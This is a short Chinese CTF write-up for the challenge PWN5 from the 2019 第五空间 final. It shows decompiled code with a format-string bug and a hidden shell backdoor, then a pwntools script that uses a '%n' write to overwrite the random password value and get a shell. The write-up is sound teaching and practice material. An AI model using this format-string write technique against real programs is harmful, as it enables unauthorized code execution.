题目链接:[第五空间2019 决赛]PWN5。
下载附件后,使用 IDA 反编译,定位到 main 函数,如下。
int __cdecl main(int a1)
{unsigned int v1; // eaxint result; // eaxint fd; // [esp+0h] [ebp-84h]char nptr[16]; // [esp+4h] [ebp-80h] BYREFchar buf[100]; // [esp+14h] [ebp-70h] BYREFunsigned int v6; // [esp+78h] [ebp-Ch]int *v7; // [esp+7Ch] [ebp-8h]v7 = &a1;v6 = __readgsdword(0x14u);setvbuf(stdout, 0, 2, 0);v1 = time(0);srand(v1);fd = open("/dev/urandom", 0);read(fd, &dword_804C044, 4u);printf("your name:");read(0, buf, 0x63u);printf("Hello,");printf(buf);printf("your passwd:");read(0, nptr, 0xFu);if ( atoi(nptr) == dword_804C044 ){puts("ok!!");system("/bin/sh");}else{puts("fail");}result = 0;if ( __readgsdword(0x14u) != v6 )sub_80493D0();return result;
}
可以看到,存在格式化字符串漏洞,并且程序中也存在后门,因此,可以直接使用 "%n" 格式化字符串写,修改内存:dword_804C044 处的值,如下。
from pwn import *
from pwn import p32, p64, u32, u64
from settings import *
from modules import *def pwn():# 0x0804C044 即 dword_804C044sa("your name:", b"aaa%12$n" + p64(0x0804C044))sla("your passwd:", "3")irt()pwn()
